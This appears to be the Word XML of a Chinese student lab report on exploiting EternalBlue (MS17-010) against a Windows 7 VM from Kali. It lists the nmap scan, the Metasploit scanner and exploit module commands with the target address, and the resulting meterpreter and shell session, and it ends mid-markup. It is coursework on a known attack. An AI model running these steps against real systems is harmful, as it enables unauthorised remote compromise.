          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4346F1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eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CA985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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D165511">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        </w:rPr>
        <w:t>报告2.网络空间安全实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88B52B">
      <w:pPr>
        <w:jc w:val="center"/>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永恒之蓝漏洞利用实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B118E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>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环境配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56471192">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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软件：VMware Workstation Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42DA27">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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虚拟机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF9DC9">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:jc w:val="both"/>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（表一）</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1"/>
        <w:gridCol w:w="2572"/>
        <w:gridCol w:w="2719"/>
        <w:gridCol w:w="1364"/>
      </w:tblGrid>
      <w:tr w14:paraId="009AE8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Pr>
          <w:p w14:paraId="2BEE83A5">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:pageBreakBefore w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers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虚拟机镜像名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E9016A">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虚拟机镜像类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06368D3E">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基本操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1364" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33D61ACC">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rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60398D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Pr>
          <w:p w14:paraId="138B07AD">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Windows虚拟机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69178F0A">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Windows靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FFA1BBA">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Windows7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1364" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14BFD69C">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rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DDAD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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B45F639">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Kali Linux虚拟机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10BE4D09">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Linux攻击机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765AD232">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Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1364" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4261B6E7">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rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="658BA53C">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p>
    <w:p w14:paraId="3484C70E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>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实验过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524AEE34">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、靶机发现及IP地址查找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BABF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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows虚拟机和Kali Linux虚拟机，然后打开攻击机的终端输入”sudo -i”然后输入用户密码，进入用户模式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C08EB">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749290" cy="1062355"/>
            <wp:effectExtent l="0" t="0" r="3810" b="444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749290" cy="1062355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D7FE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（图三）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F51CB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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用ifconfig指令查看攻击机所在地址IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E02BF">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pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5751830" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>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12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5751830" cy="1623060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0186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（图四）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45226D9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得到IP为192.168.184.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E564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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后输入“nmap 192.168.184.0/24”语句，查找靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479EB01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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5756275" cy="4304665"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>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13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5756275" cy="4304665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76BE1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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图五）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F20E34">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可以发现成功找到IP为192.168.184.133的靶机，且靶机的445端口状态为open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235822B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用msf永恒之蓝漏洞模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2A88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Theme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，打开msfconsole工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE71B7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5753100" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753100" cy="2151380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="732176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（图六）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713F854A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755005" cy="1721485"/>
            <wp:effectExtent l="0" t="0" r="10795" b="571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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755005" cy="1721485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D789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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图七）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B9FE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eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入search ms17_010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以得到一些工具，其中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4E9C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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是永恒之蓝的扫描模块，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DEF51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先使用扫描模块：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76411A0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输入”use 3”使用扫描模块；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70593D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再输入“set rhosts 192.168.184.133”设定地址；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89817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再输入“run”执行扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47543EBB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5748655" cy="1026160"/>
            <wp:effectExtent l="0" t="0" r="4445" b="254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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5748655" cy="1026160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1A3D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（图八）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A99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得到漏洞存在的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641945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再使用攻击模块：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C55CD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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>use 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用攻击模块；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8314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再输入“set rhosts 192.168.184.133”设定地址；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716577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再输入“run”执行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8D3787">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5758180" cy="3103245"/>
            <wp:effectExtent l="0" t="0" r="7620" b="825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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758180" cy="3103245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C5C4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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图九）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F08F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出现meterpreter &gt;表示攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E31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输入“shell”得到靶机，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131361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auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入“ipconfig”得到靶机信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3455DF8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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
